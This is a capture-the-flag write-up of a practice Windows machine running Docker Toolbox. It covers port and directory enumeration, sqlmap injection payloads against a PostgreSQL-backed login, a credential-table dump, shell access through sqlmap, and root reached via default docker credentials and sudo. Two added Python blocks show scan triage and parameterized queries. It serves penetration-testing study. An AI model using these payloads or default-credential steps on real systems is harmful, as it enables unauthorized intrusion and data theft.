Enumeration

NMAP

Warning: 10.10.10.236 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.236
Host is up (0.076s latency).
Not shown: 57953 closed ports, 7569 filtered ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 64.86 seconds
Nmap scan report for 10.10.10.236
Host is up (0.11s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           FileZilla ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
22/tcp  open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 5b:1a:a1:81:99:ea:f7:96:02:19:2e:6e:97:04:5a:3f (RSA)
|   256 a2:4b:5a:c7:0f:f3:99:a1:3a:ca:7d:54:28:76:b2:dd (ECDSA)
|_  256 ea:08:96:60:23:e2:f4:4f:8d:05:b3:18:41:35:23:39 (ED25519)
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp open  ssl/http      Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
| Not valid before: 2020-02-18T17:45:56
|_Not valid after:  2021-02-17T17:45:56
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -7s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-13T11:03:39
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.44 seconds
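As an added triage helper (not part of the original scan or any tool's code), the following Python parses the nmap -sV output above and flags the three things a defender would fix first: the anonymous FTP login, the certificate that had already expired at scan time, and SMB signing not being required. The embedded scan excerpt is constructed from the lines above; `triage` and its `now` argument (an ISO timestamp, here the scan date) are assumptions of this example.

```python
import re
from datetime import datetime

# Constructed excerpt of the nmap -sV output shown above; not the full scan.
NMAP_OUTPUT = """\
21/tcp  open  ftp           FileZilla ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
22/tcp  open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
443/tcp open  ssl/http      Apache httpd 2.4.38 ((Debian))
| ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd
| Not valid before: 2020-02-18T17:45:56
|_Not valid after:  2021-02-17T17:45:56
445/tcp open  microsoft-ds?

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
"""

# Port lines look like "443/tcp open  ssl/http  Apache ..." in nmap's normal output.
PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+open\s+\S+")


def triage(text, now):
    """Return (port, finding) tuples for weaknesses found in nmap normal output.

    `now` is an ISO-8601 timestamp used to decide whether a certificate had
    already expired when the scan ran. Host-script findings carry port None.
    """
    scan_time = datetime.fromisoformat(now)
    findings = []
    port = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port = int(m.group(1))  # NSE script lines that follow belong to this port
            continue
        if line.startswith("Host script results"):
            port = None  # host-level scripts are not tied to a port
            continue
        body = line.lstrip("|_ ").strip()  # drop nmap's script-output prefix
        if body.startswith("ftp-anon:") and "allowed" in body:
            findings.append((port, "anonymous FTP login allowed"))
        elif body.startswith("Not valid after:"):
            expiry = datetime.fromisoformat(body.split(":", 1)[1].strip())
            if expiry < scan_time:
                findings.append((port, "TLS certificate expired %s" % expiry.date()))
        elif "signing enabled but not required" in body:
            findings.append((port, "SMB signing not required"))
    return findings


if __name__ == "__main__":
    for port, finding in triage(NMAP_OUTPUT, "2021-04-13T11:03:39"):
        print("%s: %s" % (port or "host", finding))
```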

Gobuster

┌──(bob㉿kali)-[~/htb/toolbox]
└─$ gobuster dir -k -u https://megalogistic.com -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x html,txt,bak    
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://megalogistic.com
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,txt,bak
[+] Timeout:                 10s
===============================================================
2021/04/13 07:22:55 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 323] [--> https://megalogistic.com/images/]
/js                   (Status: 301) [Size: 319] [--> https://megalogistic.com/js/]    
/css                  (Status: 301) [Size: 320] [--> https://megalogistic.com/css/]   
/contact.html         (Status: 200) [Size: 10334]                                     
/blog.html            (Status: 200) [Size: 11609]                                     
/about.html           (Status: 200) [Size: 18491]                                     
/services.html        (Status: 200) [Size: 13264]                                     
/index.html           (Status: 200) [Size: 22357]                                     
/fonts                (Status: 301) [Size: 322] [--> https://megalogistic.com/fonts/] 
/industries.html      (Status: 200) [Size: 16188]                                     
/server-status        (Status: 403) [Size: 282]

└─$ gobuster dir -k -u https://admin.megalogistic.com -w /opt/SecLists/Discovery/Web-Content/raft-large-files-lowercase.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://admin.megalogistic.com
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/raft-large-files-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/04/13 07:51:39 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 889]
/license.txt          (Status: 200) [Size: 1107]
/.htaccess            (Status: 403) [Size: 288] 
/style.css            (Status: 200) [Size: 5186]
/.                    (Status: 200) [Size: 889] 
/.html                (Status: 403) [Size: 288] 
/dashboard.php        (Status: 302) [Size: 5862] [--> index.php]
/script.js            (Status: 200) [Size: 4451]                
/.htpasswd            (Status: 403) [Size: 288]                 
/.htm                 (Status: 403) [Size: 288]                 
/.htpasswds           (Status: 403) [Size: 288]                 
/.htgroup             (Status: 403) [Size: 288]                 
/admin.css            (Status: 200) [Size: 17057]               
/.htaccess.bak        (Status: 403) [Size: 288]                 
/.htuser              (Status: 403) [Size: 288]                 
/.ht                  (Status: 403) [Size: 288]                 
/.htc                 (Status: 403) [Size: 288]                 
/.htacess             (Status: 403) [Size: 288]        

Subdomain enum

└─$ ffuf -u https://10.10.10.236 -w /opt/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.megalogistic.com" -fl 522

        /'___\  /'___\           /'___\                                                                               
       /\ \__/ /\ \__/  __  __  /\ \__/                                                                               
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\                                                                              
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/            
         \ \_\   \ \_\  \ \____/  \ \_\                                                                               
          \/_/    \/_/   \/___/    \/_/                                                                               

       v1.3.0 Kali Exclusive <3
________________________________________________                                                                      

 :: Method           : GET                                                                                            
 :: URL              : https://10.10.10.236                                                                           
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.megalogistic.com
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40                              
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response lines: 522    
________________________________________________       
                                                           
admin                   [Status: 200, Size: 889, Words: 134, Lines: 36]
:: Progress: [100000/100000] :: Job [1/1] :: 217 req/sec :: Duration: [0:07:00] :: Errors: 0 ::  

SQL Injection

First attempt. Since we already know from bypassing the login prompt that the database is vulnerable to SQL injection, we keep poking at it with sqlmap.

sqlmap -r req.txt --batch --force-ssl

[...]

[*] starting @ 09:16:08 /2021-04-13/

[09:16:08] [INFO] parsing HTTP request from 'req.txt'
[09:16:08] [INFO] resuming back-end DBMS 'postgresql' 
[09:16:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=-7486' OR 9670=9670-- iBIe&password=asd

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: username=asdf' AND 2433=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (2433=2433) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(120)||CHR(106)||CHR(113)) AS NUMERIC)-- CBFU&password=asd

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: username=asdf';SELECT PG_SLEEP(5)--&password=asd

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: username=asdf' AND 3770=(SELECT 3770 FROM PG_SLEEP(5))-- UzvQ&password=asd
---
[09:16:09] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Debian 10 (buster)
web application technology: PHP 7.3.14, Apache 2.4.38
back-end DBMS: PostgreSQL
[09:16:09] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[09:16:09] [INFO] fetching database (schema) names
[09:16:10] [INFO] retrieved: 'public'
[09:16:10] [INFO] retrieved: 'pg_catalog'
[09:16:11] [INFO] retrieved: 'information_schema'
available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public

From enumerating the tables, public looks interesting as it contains a users table, so we dump it.

sqlmap -r req.txt --batch --force-ssl -D public --dump

[...]

back-end DBMS: PostgreSQL
[09:18:39] [INFO] fetching tables for database: 'public'
[09:18:39] [INFO] resumed: 'users'
[09:18:39] [INFO] fetching columns for table 'users' in database 'public'
[09:18:40] [INFO] retrieved: 'password'
[09:18:40] [INFO] retrieved: 'varchar'
[09:18:40] [INFO] retrieved: 'username'
[09:18:41] [INFO] retrieved: 'varchar'
[09:18:41] [INFO] fetching entries for table 'users' in database 'public'
[09:18:41] [INFO] retrieved: '4a100a85cb5ca3616dcf137918550815'
[09:18:42] [INFO] retrieved: 'admin'
[09:18:42] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[09:18:42] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:18:42] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[09:18:42] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[09:18:42] [INFO] starting 2 processes 
[09:19:15] [WARNING] no clear password(s) found                                                                                                                                                                                             
Database: public
Table: users
[1 entry]
+----------------------------------+----------+
| password                         | username |
+----------------------------------+----------+
| 4a100a85cb5ca3616dcf137918550815 | admin    |
+----------------------------------+----------+

[09:19:15] [INFO] table 'public.users' dumped to CSV file '/home/bob/.local/share/sqlmap/output/admin.megalogistic.com/dump/public/users.csv'
[09:19:15] [INFO] fetched data logged to text files under '/home/bob/.local/share/sqlmap/output/admin.megalogistic.com'

[*] ending @ 09:19:15 /2021-04-13/
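The login bypass that made the sqlmap session above possible, beside the parameterized form that closes it. This is an added example, not the application's code: it uses an in-memory SQLite table as a stand-in for the PostgreSQL public.users table (the page's boolean-based payload also parses under SQLite's `--` comment syntax), with a constructed row rather than the dumped hash, and `make_db`, `login_vulnerable` and `login_parameterized` are names assumed here.

```python
import hashlib
import sqlite3


# In-memory stand-in for the public.users table dumped above (constructed row;
# the hash is not the one from the dump). Unsalted MD5 is kept only to mirror
# what sqlmap recognised as 'md5_generic_passwd'; real code should store a slow,
# salted hash such as bcrypt or argon2 instead.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)",
               ("admin", hashlib.md5(b"constructed-password").hexdigest()))
    return db


def login_vulnerable(db, username, password):
    """Builds the WHERE clause by concatenation, so the username is parsed as SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + pw_hash + "'")
    return db.execute(sql).fetchone() is not None


def login_parameterized(db, username, password):
    """Same check with bound parameters: the username is data, never SQL."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, pw_hash),
    ).fetchone()
    return row is not None


# The boolean-based payload sqlmap reported above, sent in the username field.
# In the concatenated query it closes the quoted string, ORs in an always-true
# comparison and comments out the password check, so any password is accepted.
BYPASS = "-7486' OR 9670=9670-- iBIe"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass payload:   ", login_vulnerable(db, BYPASS, "asd"))
    print("parameterized, bypass payload:", login_parameterized(db, BYPASS, "asd"))
    print("parameterized, real password: ",
          login_parameterized(db, "admin", "constructed-password"))
```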

We get command execution with sqlmap's --os-shell:

└─$ sqlmap -r req.txt --force-ssl --os-shell

[...]

And land a shell. We use find to locate the user flag:

postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ find / -type f -name user.txt 2>/dev/null
/var/lib/postgresql/user.txt
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$

User flag down!

From deepce:

[+] Kernel .................. 4.14.154-boot2docker

From the documentation we learn that there is a pair of default creds.

If we try these creds:

tcuser@172.17.0.1: Permission denied (publickey,password,keyboard-interactive).
ssh docker@172.17.0.1
tcuser

   ( '>')
  /) TC (\   Core is distributed with ABSOLUTELY NO WARRANTY.
 (/-_--_-\)           www.tinycorelinux.net

docker@box:~$

With sudo -l:

User docker may run the following commands on this host:
    (root) NOPASSWD: ALL
sudo bash -p
whoami
root
root@box:/home/docker#

Since this is running on Windows, we can get to the host's file system at /c/:

docker@box:/c/Users/Administrator/Desktop$   ls
desktop.ini  root.txt